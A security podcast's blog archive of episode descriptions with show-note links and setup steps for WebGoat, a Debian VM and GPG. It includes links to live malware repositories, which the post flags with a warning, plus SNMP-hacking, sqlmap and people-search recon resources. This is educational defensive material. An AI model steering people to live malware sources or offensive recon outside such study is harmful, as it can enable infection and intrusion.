Pawel's Blog = ipsec.pl
Pawel's CSP builder app = cspbuilder.info
Quick Guide to CSP: http://content-security-policy.com/
Published on: February 21, 2015
Pawel Krawczyk did an interview with us about Content Security Policy. Learn about what it is, and whether or not the latest browsers can support it.
We also talk about how you can get around it, if there are ways to avoid it if you are a bad guy, and how you can get the most out of it.
If you're a web developer, and want to reduce your site's chances of allowing XSS, you'll want to take a listen to this.
https://w3c.github.io/webappsec/specs/content-security-policy/#changes-from-level-1
https://w3c.github.io/webappsec/specs/content-security-policy/#directive-sandbox
Published on: February 16, 2015
Extra special treat this week! We do a continuation of our review of the Top 20 Security Controls, in which we do #14 and #15, which all of you will find very interesting.
But the real reason we are posting this today is the Call for Papers and Call for Mentors for the Bsides Las Vegas Proving Grounds! We invited Magen Wu (@tottenkoph) on to discuss. If you've ever asked yourself "I'd like to give a talk, but they'd never put me on" NOW IS YOUR CHANCE! :)
This is a great opportunity if you're a veteran speaker, or just want to give back to the community at large... You can mentor a n00b to help them create a topic, help them hone their paper, and be with them when they give the talk at Bsides Las Vegas in July.
Many thanks to @tottenkoph and @securitymoey. They need your help, both as a mentor and a mentee. This is also an excellent networking opportunity. You get 1-on-1 access to an often influential mentor, someone in the infosec community, and your talk will be seen by several hundred people. hmmm.... maybe I should put one in :D
-----
SANS #14-10:
Ensure that the log collection system does not lose events during peak activity, and that the system detects and alerts if event loss occurs (such as when volume exceeds the capacity of a log collection system). This includes ensuring that the log collection system can accommodate intermittent or restricted-bandwidth connectivity through the use of handshaking / flow control.
------
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
During our research with Lee Brotherston, who we had on last week for our podcast on threat modeling, we got to listen to one of his talks about how his ISP in Canada was actively doing a Man-in-the-Middle injection of a banner into sites that he visited.
We were intrigued, and also gobsmacked (I can say that, right?) about the brashness of an ISP not apparently understanding the security implications of this, so we had him back on to talk about the finer points of his research. The bad news? Other ISPs, including American ISPs, are using this technology.
This is one of those podcasts that you need to tell your friends about, 'cause it's truly surprising the lengths ISPs go to in injecting content into your pages.
We also have a short message about the Bsides Las Vegas Proving Grounds this year... If you've wanted to present a paper at a conference, and have a mentor guide you through the process, hit them up on the Proving Grounds page at http://www.bsideslv.com
Show notes (lots of info): https://docs.google.com/document/d/1YLkiRE1SVIyWquWc-iQrESWlT10rSJmW1VcrOX3kQZ0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Threat Modeling... ranks right up there with Risk Assessments in importance... You gotta figure out how the applications you're creating or the systems you're engineering are secure. It really takes knowing your application and, really, knowing the enemies/factors that can cause your application to fail, from sanitizing inputs on a web app, to making sure that your code doesn't have use-after-free bugs.
Brakeing Down Security talked about conducting threat modeling and application reviews with Lee Brotherston (@synackpse) from Leviathan Security (@LeviathanSecurity) this week. We discuss types of risk analysis, including one named 'Binary Risk Analysis', which may simplify assessment of your computer systems.
Show notes = https://docs.google.com/document/d/1K-eycek2Xud7loVC4yrHg6eHCY0oyztV_ytbY433oYk/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Mr. Boettcher and I went over the bottom 5 of the SANS Top 20 security controls that businesses should implement. When put into the right order, you should be able to have an environment that is able to withstand most any attack.
We also talk about 5 'Quick Fixes' that will put you on the right track with becoming more secure.
You may be surprised at what is considered a priority... have a listen: (QR code links to the mp3)
Show notes: https://docs.google.com/document/d/1JuRJ-RPTmw50pTeO82rb9_rC8tFf53eiUzkppfwQvs0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Brakeing Down Security tackles the 'Deep Web' this week... yep, we talk about Tor. If you don't have a lot of experience with this or wonder how it works, we give you a little history and help you understand how the traffic flow works.
We even give you some advice on de-identification and things you shouldn't allow when traveling the Deep Web, like Javascript, Flash, and Java.
Show Notes:
https://docs.google.com/document/d/1vBI_bg_0RzF_sSNMj84xQpEZGUrxtAkB8SxZ08MzUi0/edit?usp=sharing
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Security's the same, the world around... and is a necessity in businesses of all sizes, from the mega-corporations, all the way down to the business with 10 employees in a garage in suburbia.
This week, Mr. Boettcher and I discuss security in small businesses. What is needed to make security part of the culture of a new company. We discuss some open source tools to ensure that networks are monitored properly, logs are collected, collated, and analyzed. And better yet, these are on the cheap, which is helpful for a small business on a tight budget.
QR code links directly to the episode...
http://www.ihotdesk.co.uk/article/801717385/Most-small-businesses-have-faced-InfoSec-breach-recently
https://blog.whitehatsec.com/infosec-europe-wrapup/
http://www.infosectoday.com/Articles/DRPlanning.htm
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This is a quick little podcast I did without Mr. Boettcher about a Twitter discussion that occurred when Dr. Neil deGrasse Tyson mentioned that we should just make computers 'unhackable'.
The first episode of the 2015 season of Brakeing Down Security is here!
Tweet from Dr. Neil deGrasse Tyson
https://twitter.com/neiltyson/status/551378648578916353
Rebuttal from Kevin Johnson
https://twitter.com/secureideas/status/551510885441998848
"Dirty Rhodes" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Published on: January 4, 2015
We at Brakeing Down Security world headquarters don't understand the concept of an 'End of the Year' podcast, so consider this the "End-End of the Year" podcast.
We talked about the order of things... whether Compliance is a detriment to Security, and who should be running whom.
So pull up a glass of eggnog, grab another cookie, and put another log on the fire, 'cause Brakeing Down Security is throwing out one more for the year! Happy Holidays... all of them... :)
Published on: December 26, 2014
It's a Super Deluxe sized Brakeing Down Security this week...
It's something you've dreamed of forever (or not), but Jerry Bell and Andrew Kalat from Defensive Security Podcast stopped by and we made ourselves a podcast baby... Boy, was it ugly :)
I'm just kidding, we had a great time discussing some news, and going over what we learned... and any good end-of-year podcast must have predictions...
We also discussed Sony, 'cause it's the huge news of the year, and talked about Target, because we love dissing PCI... ;)
There might be a few bad words, so if you have small ears around, be advised...
When you're done, check out the other 96 episodes of Defensive Security, and check out our 55 other episodes..
http://www.defensivesecurity.org/
Twitter handles:
Andrew Kalat: https://twitter.com/lerg
Jerry Bell: https://twitter.com/Maliciouslink
Icon provided by DefensiveSecurity.org... I'd imagine they'd let us use it, since they were on the podcast ;)
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
This week, Tyler gave us a great deal of information on where to start if you wanted to become a malware researcher. He also gave us websites where you can get malware and ways to analyze it.
We asked Tyler what blue teams can do when they are infected, and he gave us some excellent advice...
I also recite some prose from a classic horror author, so come for the malware, stay for the prose! :)
***NOTE: I guess now would be a good time to mention that many of the links below have unsafe software and actual malware payloads, so use with extreme caution. Especially, do not download anything from these sites unless it's in a VM that is not on your company's assets.***
http://www.hopperapp.com/ - Disassemble OS X binaries
http://en.wikibooks.org/wiki/X86_Disassembly/Disassemblers_and_Decompilers - other Disassemblers
http://vxheaven.org/ - Virus Heaven
http://www.malwaredomainlist.com/ - Find websites serving malware
http://oc.gtisc.gatech.edu:8080/ - Georgia Tech malware repository
Sandboxie - http://www.sandboxie.com/
KoreLogic - http://www.korelogic.com/ (lots of great tools here)
http://secshoggoth.blogspot.com/ - Tyler's Blog
Published on: December 15, 2014
Tyler Hudak (@secshoggoth) came to discuss with us the process of doing analysis on malware binaries. We talk about MASTIFF, his malware framework. We also discuss how to gain information from malware program headers, and some software that is used to safely analyze it.
Helpful Links:
Ida Pro: https://www.hex-rays.com/products/ida/
Process Monitor - http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
Mastiff White Paper: http://digital-forensics.sans.org/blog/2013/05/07/mastiff-for-auto-static-malware-analysis
Mastiff latest: http://sourceforge.net/projects/mastiff/files/mastiff/0.6.0/
cuckoo sandbox: www.cuckoosandbox.org
Anubis: https://anubis.iseclab.org/
PE Headers: http://en.wikipedia.org/wiki/Portable_Executable
ELF: http://fr.wikipedia.org/wiki/Executable_and_Linkable_Format
REMnux - reverse engineering Linux distro: https://remnux.org/
Inetsim: http://www.inetsim.org/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Last week, we talked with Ben Donnelly about ADHD (Active Defense Harbinger Distro). But Ben isn't a one trick pony, oh no... this young punk is trying to solve fundamental problems in the industry, in particular securing passwords. That's why he's been working with Tim Tomes (@lanmaster53) and invented 'Ball and Chain', which is a large (>2TB) file that can be used to help generate passwords and entropy.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
It's a bit meta, cause this will show up there in a few minutes, but Brakeing Down Security now has a Tumblr...
Don't know why it took so long... We'll be posting from other Tumblr blogs, and our episodes will post there... I hope you will spread the word...
http://brakeingdownsecurity.tumblr.com/
Published on: November 30, 2014
When Mr. Boettcher and I started the Brakeing Down Security Podcast, we really did it for 2 reasons:
1. We wanted to educate people and ourselves about information security topics, and do it in a way that was fun
2. Educate ourselves about some topics that we were not familiar with, because infosec and compliance is such a vast range of topics and skills
Mr. Boettcher and I want to extend a warm and hearty THANK YOU SO MUCH for inviting us into your podcasting listening device. We realize there are a ton of infosec podcasts out there, and you allowing us to share space with them makes us so happy.
Look for more podcasts in December, and in the new year, look for more videos and excellent interviews.
As we've always said, we do this podcast for you, and we want to know what you want to hear or see. If you have a topic you'd love to have us talk about, or you'd like to come on our podcast and talk about something you're working on, please let us know. We want input, so please leave us some feedback on iTunes, or tweet our podcast to your friends
Happy Thanksgiving to our US fans, Happy Thursday for the rest of the world...
Bryan Brake
Creator, Co-Host of the Brakeing Down Security podcast
@bryanbrake
@boettcherpwned
Website: www.brakeingsecurity.com
RSS: brakeingsecurity.libsyn.com/rss
iTunes: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
EMAIL: [email protected]
Published on: November 27, 2014
We snagged an interview with Benjamin Donnelly, a maintainer of the Active Defense Harbinger Distribution (ADHD), version 0.60.
A thoroughly enjoyable conversation with a new up-and-coming security professional. He's the future, and he is already contributing a lot of great info to the infosec industry.
Part 1 is all about ADHD, next week, we discuss his talk about a project he's working on that will remove the threat of password breaches using 'Ball and Chain'. And it's all open source...
ADHD ISO: http://sourceforge.net/projects/adhd/
CryptoLocked: https://bitbucket.org/Zaeyx/cryptolocked
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
My man Mr. Boettcher posted up a video on how to install OWASP's WebGoat Vulnerable web application!
He walks you through WebGoat 5.4, and even gives you some tips on solving issues that he'd found. And to make it even easier, he's given you some instructions below.
Hope you enjoy, especially if you've had issues setting up WebGoat in the past.
Webgoat 5.4 instructions
========================
1. search google and download the war file
(From Bryan: Here's the link -- https://code.google.com/p/webgoat/downloads/list )
2. install tomcat
sudo apt-get install tomcat7
3. move the war file to tomcat webapp directory
sudo mv ~/Downloads/WebGoat-5.4.war /var/lib/tomcat7/webapps/WebGoat.war
4. edit tomcat-users.xml by adding the content below
sudo vi /var/lib/tomcat7/conf/tomcat-users.xml
5. restart tomcat
sudo /etc/init.d/tomcat7 restart
6. in your browser, type localhost:8080/WebGoat/attack
Active Defense... It conjures images of the lowly admin turning the tables on the evil black hat hackers, and giving them a dose of their own medicine by hacking their boxes and getting sweet, sweet revenge... But did you know that kind of 'revenge' is also rife with legal ramifications, even bordering on being illegal??
This week, Mr. Boettcher and I tackle this prickly subject, and discuss some software you can use to 'deter, prevent, and dissuade' potential bad guys...
ADHD Training (courtesy of Paul's Security Weekly Podcast): http://blip.tv/securityweekly/active-defense-harbinger-distribution-release-party-7096833
Artillery - https://www.binarydefense.com/project-artillery/
DenyHosts - http://denyhosts.sourceforge.net/
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
If you think Halloween was scary, Paul Coggin gives us another reason to curl up in the fetal position as he explains Lawful Intercept and Route Maps. And what's worse, your 3rd party auditors are starting to get the tools that will make you address network protocol issues.
Lots of great material below in our show notes, including some (free) tools that you can use to get yourself schooled on network protocols.
BGPmon - http://www.bgpmon.net/
Renesys (now Dyn Research) http://research.dyn.com/
BGP Play - http://bgplay.routeviews.org/
BGP Looking glass servers - http://www.bgp4.as/looking-glasses
yersinia - http://www.yersinia.net/
Fx Twitter handle - https://twitter.com/41414141
ernw - https://www.ernw.de/
Cisco Route Maps - http://www.cisco.com/c/en/us/support/docs/ip/border-gateway-protocol-bgp/49111-route-map-bestp.html
Paul's Bsides Nashville talk - http://www.irongeek.com/i.php?page=videos/bsidesnashville2014/300-bending-and-twisting-networks-paul-coggin
Huawei ENSP - http://enterprise.huawei.com/en/products/network-management/automation-tools/tools/hw-201999.htm
NRL Core - http://www.nrl.navy.mil/itd/ncs/products/core
NRL Mgen - http://www.nrl.navy.mil/itd/ncs/products/mgen
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
One of the talks my colleague got to see was Paul Coggin's talk about internetworking routing and protocols. In this interview, we discuss some tools of the trade, how MPLS isn't secure, and why you should be doing end-to-end encryption without allowing your VPN or circuit provider to do it for you...
If you have any interest in network security, including the higher order network protocols like BGP, MPLS, ATM, etc... You'll want to check out his DerbyCon talk, and our interview...
Paul's Derbycon 2014 talk - http://www.irongeek.com/i.php?page=videos/derbycon4/t319-bending-and-twisting-networks-paul-coggins
Hacking SNMP tips and tricks: http://securityreliks.securegossip.com/2011/04/hacking-snmp-in-a-few-simple-steps/
SNMPBlow: http://www.stoptheplague.com/?p=19
ERNW: https://www.ernw.de/research-community/index.html
Fx paper on Lawful Intercept: http://phenoelit.org/stuff/CSLI.pdf
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
In an effort to educate ourselves for an upcoming interview, we sat down and talked about SNMP (Simple Network Management Protocol). We get into the basics, the ins and outs of the protocol, the different tools that use (or exploit) SNMP, and we talk about how to better secure your SNMP implementation. You should listen to this, because next week's interview will knock your socks off. :)
Finally, We end with a DerbyCon interview Mr. Boettcher snagged with our friend Mr. Kevin Johnson about how we need to regulate ourselves with regard to a code of ethics, before someone regulates us... When one 'white hat' can run code on a server he/she doesn't control (unpatched Shellshock) and thinks it's okay, where do we draw the line from what is right, and what violates the CFAA? Mr. Johnson looks for an answer with our Mr. Boettcher.
Wikipedia SNMP article: http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
SNMP Primer: http://www.tcpipguide.com/free/t_SNMPProtocolOverviewHistoryandGeneralConcepts.htm
SNMP OIDS and MIBS: http://kb.paessler.com/en/topic/653-how-do-snmp-mibs-and-oids-work
SNMP vulnerabilities - http://packetstormsecurity.com/search/?q=snmp
SNMP Primer (IBM): http://pic.dhe.ibm.com/infocenter/tpfhelp/current/index.jsp?topic=%2Fcom.ibm.ztpf-ztpfdf.doc_put.cur%2Fgtpc1%2Fpdus.html
SNMP amplification attacks: http://www.pcworld.com/article/2159060/ddos-attacks-using-snmp-amplification-on-the-rise.html
Securing SNMPv3: http://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051
Kevin Johnson/James Jardine DerbyCon Talk: http://www.irongeek.com/i.php?page=videos/derbycon4/t308-ethical-control-ethics-and-privacy-in-a-target-rich-environment-kevin-johnson-and-james-jardine
Image courtesy of Wikipedia.de
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 3.0
http://creativecommons.org/licenses/by/3.0/
Tcpdump is just one of the tools that will make troubleshooting network issues, testing applications, or even finding out what traffic is being generated on a host that much easier. This podcast is meant to help you understand the Tcpdump program, and how powerful it is...
http://danielmiessler.com/study/tcpdump/
http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/
http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/
http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469
http://www.computerhope.com/unix/tcpdump.htm
http://www.commandlinefu.com/commands/using/tcpdump -- excellent examples
http://www.amazon.com/Practical-Packet-Analysis-Wireshark-Real-World/dp/1593272669/
Part 2 of our interview with Jarrod Frates (FRAY-tes). We ask him about the value that a pentest can create, and the way that the 'perfect' pentest can change culture and help create dialogue.
We also talk about how to take your automated testing results and then shift gears to manual testing: when to stop the automated testing and start testing by hand.
Hope you enjoy, have a great week!
We went a little off the beaten path this week. I wanted to talk to Mr. Boettcher about his experience at DerbyCon, and we ended up having another friend of ours who also attended DerbyCon, Jarrod Frates, join us for a bit of discussion. We discussed several talks, and even spent a little bit of time talking about ShellShock and its larger implications for those programs that are ubiquitous, yet are not being audited, like bash. (The llama graphic will make more sense next week...) :)
http://www.irongeek.com/i.php?page=videos/derbycon4/t109-et-tu-kerberos-christopher-campbell
http://www.irongeek.com/i.php?page=videos/derbycon4/t217-hacking-mainframes-vulnerabilities-in-applications-exposed-over-tn3270-dominic-white
http://www.irongeek.com/i.php?page=videos/derbycon4/t210-around-the-world-in-80-cons-jayson-e-street
http://www.irongeek.com/i.php?page=videos/derbycon4/t216-once-upon-a-time-infosec-history-101-jack-daniel
http://askubuntu.com/questions/529511/explanation-of-the-command-to-check-shellshock
We finished up our odyssey with Marcus J. Carey this week. We picked his brain about how he feels about China, the coming cyberwar, and what kinds of tools he uses in his toolbox (hint: he doesn't use Kali).
We also talk a bit about the entitlement of people, and what makes folks in poorer countries turn to hacking. We really enjoyed hearing his take on certifications and education. He's a Ruby nut, but suggests that people learn Python. He also talks about how he teaches people about security: the little everyday things that show you do security.
A thought provoking interview that will definitely inspire you to pour yourself into a Python book, or to grab a Raspberry Pi and start learning.
This month, I wanted to go over a piece of software that seems to give a lot of people problems. In business, there is always a need for sending secure communications, whether because a client asked for it, or because sending sensitive information unencrypted could result in loss of profit, competitive edge, reputation, or all of the above.
This month's tutorial is on setting up PGP or GPG so you can be more secure when sending email. I show you commands that allow you to create public/private key pairs, and also discuss the software to be used on Windows, Linux, or Mac OS. I mention signing and encrypting email attachments, and also explain that your headers are still unencrypted, so email metadata tracking is still possible.
Brakeing Security Podcast on PGP/GPG: http://brakeingsecurity.com/pgp-and-gpg-protect-your-data
Windows GPG solution: http://www.gpg4win.org
Mac GPG solution: https://gpgtools.org/
Kali/Linux RNG daemon instructions:
1. apt-get install rng-tools (the Debian/Kali package that provides rngd)
2. rngd -r /dev/urandom (should make PGP key creation on Kali much faster)
Published on: September 28, 2014
Marcus J. Carey, a security researcher and software developer, came on to talk to us about FireDrill.me, a tool used to help people work out their Incident Response muscles. He is also the creator of threatagent.com.
Marcus is well known in Security circles, and after we talked to him about FireDrill and ThreatAgent, we got his opinion of other subjects that interested us in the Infosec industry. Marcus is a man of his own mind, and he certainly did not disappoint. Hope you enjoy Part 1 of our conversation with him.
We also asked him about the celebrity that many in the industry face, and how it should be handled by people in the industry.
HoneyDocs - http://www.pcworld.com/article/2048881/honeydocs-lays-irresistible-bait-for-hackers.html
Malcolm Gladwell - http://en.wikipedia.org/wiki/Malcolm_Gladwell
While I'm stuck at work, Mr. Boettcher went to the Austin Hackformers and snagged an interview with Mr. Ed Skoudis, of InGuardians and of the SANS Institute, a top-flight training academy. He is to be one of the keynote speakers at DerbyCon this year. He gives us a peek at his keynote, and Mr. Boettcher asks for his thoughts on the industry as a whole, on SCADA security, and on the state of Infosec.
Hackformers Austin: http://www.hackformers.org/
Ed Skoudis bio: http://www.sans.org/instructors/ed-skoudis
Bad Guys are Winning - Part 1: link
Bad Guys are Winning - Part 2: link
Bad Guys are Winning - Part 3: link
Bad Guys are Winning - Part 4: link
Bad Guys are Winning - Part 5: link
Netwars: Cybercity - http://www.sans.org/netwars/cybercity
Google Car: http://www.nbcbayarea.com/news/local/Google-to-Test-Self-Driving-Car-Without-Backup-Driver-275033691.html
We're back with part 2 of our discussion with Michael Gough. Not only do we discuss more about malware, but we also ask Michael's opinion on how commercialized conventions like Black Hat and Defcon have gotten, how good threat intelligence feeds are, and why there aren't more defensive talks at cons.
Michael is currently slated to give a talk on logging at DerbyCon September 24th, 2014 on how logging can help to mitigate malware infections.
Brian and I managed to get an interview with Michael Gough. If you remember, Michael was on to discuss malware infections back in February, and we decided it was time to check up on him and his newly named 'Malware Sentinel'. This is part 1, where we discuss some of the recent malware infections, where you need to look for new file creation, and what you can be looking for in your Windows logs that are excellent indicators of malware compromise.
Windows logging cheat sheet - http://sniperforensicstoolkit.squarespace.com/storage/logging/Windows%20Logging%20Cheat%20Sheet%20v1.1.pdf
Malware Management Framework - http://sniperforensicstoolkit.squarespace.com/malwaremanagementframework
I had a healthy debate with Mr. Boettcher this week about the merits of doing recon for a pentest. Mr. Boettcher is a heavy duty proponent of it, and I see it as a necessary evil, but not one that I consider important. We hash it out, and find some common ground this week.
People search links:
Spokeo - http://www.spokeo.com/
Pipl - https://pipl.com/
Sec Filings site: http://www.sec.gov/edgar/searchedgar/webusers.htm
Mr. Boettcher made a thing! He created a video that highlights how to install Linux securely in a VM. His next video will be how to set up OWASP's WebGoat to test for vulnerable web apps. He noticed that documentation is a bit sparse, and often contradictory, so he wanted to help other folks who are having issues to get a proper install.
You will need a Network Install ISO of Debian, and you will need either VMware Player or Workstation.
His notes are below... Enjoy!
Secure the Goat #1 - Goat Pen
Create a directory where you will put the VM. We'll call it 'goat'.
Download the Debian Network Install ISO and place it in the 'goat' directory.
Create a 'share' directory inside the 'goat' directory.
Place a (test) file in the 'share' directory.
In VMware Workstation, create a new VM using the Debian ISO and run the install.
Update the sudoers file:
$ su - root
$ update-alternatives --config editor
Change to vim.tiny by pressing 2 and Enter.
$ visudo -f /etc/sudoers
Copy the root line and add one for the goat user.
In order to install VMware Tools, we'll need to install these packages:
$ sudo apt-get install gcc linux-headers-$(uname -r) make
For the VMware Tools install to work properly, these symlinks are required:
$ cd /lib/modules/$(uname -r)/build/include/linux
$ sudo ln -s ../generated/utsrelease.h
$ sudo ln -s ../generated/autoconf.h
Insert the VMware Tools virtual CD:
In the Workstation menu, select VM -> Install VMware Tools.
$ tar -C /tmp/ -zxvf /media/cdrom/VMwareTools...
$ sudo /tmp/VMwareTools.../vmware-install.pl
Show desktop icons:
$ gsettings set org.gnome.desktop.background show-desktop-icons true
Change the resolution in the menu at the top:
Applications / System Tools / Preferences / System Settings, then 'Displays'.
In Workstation, under VM / Settings, set the virtual machine shared folder.
Remove the ISO file and take a snapshot.
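A shell script that carries out the guest-side steps above unattended, as an added example that is not part of Mr. Boettcher's notes. It assumes the unprivileged account is named goat, writes the sudoers entry as a drop-in under /etc/sudoers.d validated with visudo -c instead of editing /etc/sudoers by hand, and assumes the Tools tarball has been unpacked to /tmp/vmware-tools-distrib.

```shell
#!/bin/sh
# Added example, not part of Mr. Boettcher's notes: performs the guest-side
# preparation steps on a Debian VM. Assumptions: the unprivileged account is
# called "goat", the VMware Tools tarball has already been unpacked under /tmp
# by hand, and the matching linux-headers package is available from apt.
# The helpers take explicit paths so they can be exercised in a scratch directory.
set -eu

# Build the sudoers entry for a user, mirroring Debian's default root line.
sudoers_line() {
    printf '%s ALL=(ALL:ALL) ALL\n' "$1"
}

# Install the entry as a drop-in file rather than editing /etc/sudoers in place.
# When running as root, keep the file only if visudo accepts its syntax, so a
# typo can never lock everyone out of sudo.
add_sudoer() {
    user=$1
    dir=${2:-/etc/sudoers.d}
    file="$dir/$user"
    sudoers_line "$user" > "$file"
    chmod 0440 "$file"
    if [ "$(id -u)" -eq 0 ]; then
        visudo -c -f "$file" >/dev/null || { rm -f "$file"; return 1; }
    fi
}

# Create the two generated-header symlinks the VMware Tools build expects;
# safe to run more than once.
link_generated_headers() {
    inc=$1    # e.g. /lib/modules/$(uname -r)/build/include/linux
    for h in utsrelease.h autoconf.h; do
        [ -e "$inc/$h" ] || ln -s "../generated/$h" "$inc/$h"
    done
}

# True when both links resolve to real header files.
headers_linked() {
    [ -f "$1/utsrelease.h" ] && [ -f "$1/autoconf.h" ]
}

# Unattended run of the whole sequence; only when invoked with --run, as root.
if [ "${1:-}" = "--run" ]; then
    [ "$(id -u)" -eq 0 ] || { echo "run this as root" >&2; exit 1; }
    add_sudoer goat
    apt-get install -y gcc "linux-headers-$(uname -r)" make
    inc="/lib/modules/$(uname -r)/build/include/linux"
    link_generated_headers "$inc"
    headers_linked "$inc" || { echo "generated headers missing" >&2; exit 1; }
    # vmware-tools-distrib is the directory the VMwareTools tarball unpacks to (assumed).
    if [ -x /tmp/vmware-tools-distrib/vmware-install.pl ]; then
        /tmp/vmware-tools-distrib/vmware-install.pl
    fi
fi
```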
This week, we go into a proxy program called "Ratproxy" and discuss its ins and outs. Plus, Mr. Boettcher and I have a discussion about how we as infosec people should work with developers and IT professionals to provide them with training and an understanding of security concepts.
https://code.google.com/p/ratproxy/
http://blog.secureideas.com/2012/07/how-to-setup-ratproxy-on-windows.html
Ratproxy icon courtesy of honeytech and Flickr
Here is Part 2 of our video for understanding the basics of Nmap. I discuss some of the logging output, the scripts found in Nmap, and the output that Nmap gives you for reporting or comparison later.
I really did want to go more into the Lua portion of the scripting engine, and perhaps make a simple script, but time constraints halted that. I hope to get more adept at video creation and editing, to make a more concise video tutorial.
Nmap target specifications: http://nmap.org/book/man-target-specification.html
http://nmap.org/book/nse-usage.html
Explanation of all Nmap scripts: http://nmap.org/nsedoc/
nmap icon courtesy of insecure.org
Published on: August 10, 2014
This week we take some time to talk about risk management with Josh Sokol. This is part 2 from our interview with him last week... We talk some more about Simple Risk from the POV of Risk Management, as well as the licensing/modification of Simple Risk.
Mr. Boettcher and Josh discuss the merits of Qualitative vs. Quantitative Risk Analysis, and which one is better...
We also discuss NIST 800 series guidelines, and how he used those to excellent effect in Simple Risk.
Josh also discusses OWASP, how the advocacy and outreach works and how flexible the organization is.
NIST 800 Series docs - http://csrc.nist.gov/publications/PubsSPs.html
Josh Sokol is on the International OWASP board of directors in addition to being the Information Security Program Owner at National Instruments in Austin, Texas. This week, he sat down with Brakeing Down Security to talk about Simple Risk, his homebrew application that assists people and organizations in managing their business risk, and at a much nicer cost than other GRC applications (it's free!). Check out Part 1 below. If you're at BlackHat 2014 this year, he will be showcasing it at Arsenal!
This is a flashback from July 2015.
Mr. Boettcher and I discussed SQLMAP, a tool that can automate the process of pentesting databases and even registries on Windows. We discuss some functions of the program and why developers should get training on these.
Mr. Boettcher and I talk about how Infosec professionals should help to educate QA and Developers to be able to look at their processes and incorporate security testing, using tools like sqlmap in the Software lifecycle.
SQLMAP links
SQLMAP Wiki and more detailed documentation - https://github.com/sqlmapproject/sqlmap/wiki
https://github.com/sqlmapproject/sqlmap
http://hackertarget.com/sqlmap-tutorial/
https://www.owasp.org/index.php/Automated_Audit_using_SQLMap
http://www.binarytides.com/sqlmap-hacking-tutorial/
http://blog.spiderlabs.com/2013/12/sqlmap-tricks-for-advanced-sql-injection.html
It only gets better in Part 2 of our Interview with Georgia Weidman, Author, Security Researcher and Creator of the Smartphone Pentesting Framework.
She talks about how people underestimate the mobile platform for pentesting purposes, and we even find out that in addition to teaching a class on exploit development at BlackHat this year, she's going to be helping a great organization overseas.
We also got her talking about some do's and don'ts of pentesting! ;)
Please enjoy!
Georgia's book on No Starch: http://www.nostarch.com/pentesting
on Amazon.com: http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641 (non-sponsored link)
So, I uploaded this little tutorial of nmap, a very nice tool I use on a regular basis, both at home and at work.
I did some basic scans, showed off the command line and the Windows 'Zenmap' version, as well as discussed some regularly used switches.
The next video I do about nmap will discuss more switches, the Nmap Scripting Engine (NSE), and how to format reports and the output nmap provides.
Nmap icon courtesy of livehacking.com
Published on: July 14, 2014
We have a real treat the next two weeks: Author and Mobile Security Researcher Georgia Weidman, who we also found out will be providing exploit development training at Black Hat this year.
She is the author of an awesome book "Penetration Testing: A Hands-On Introduction to Hacking" (http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641/ref=sr_1_1?ie=UTF8&qid=1405304124&sr=8-1&keywords=georgia+weidman)
She sat down with us over Skype and gave a nice talk about where she came from, and why she wrote the book, and even what she's about to do in the future (that's next week) ;) You'll have to listen next week to find out the awesome trip she's about to take.
This is the continuation of our podcast from last week with Phil Beyer.
We started out talking about risk registers, and we end the podcast with a little Q&A about positions in companies (Chief Risk Officer, Chief Data Protection Officer), and whether these positions are useful.
Risk registers - http://en.wikipedia.org/wiki/Risk_register
Hello valued Listener! I want to do another video, and I thought that you might want to decide which one piece of software I highlight. So here are three options:
1. Nikto
2. Nmap
3. OpenVAS
You can send me your choice to my twitter (@bryanbrake) or to my gmail account ([email protected]).
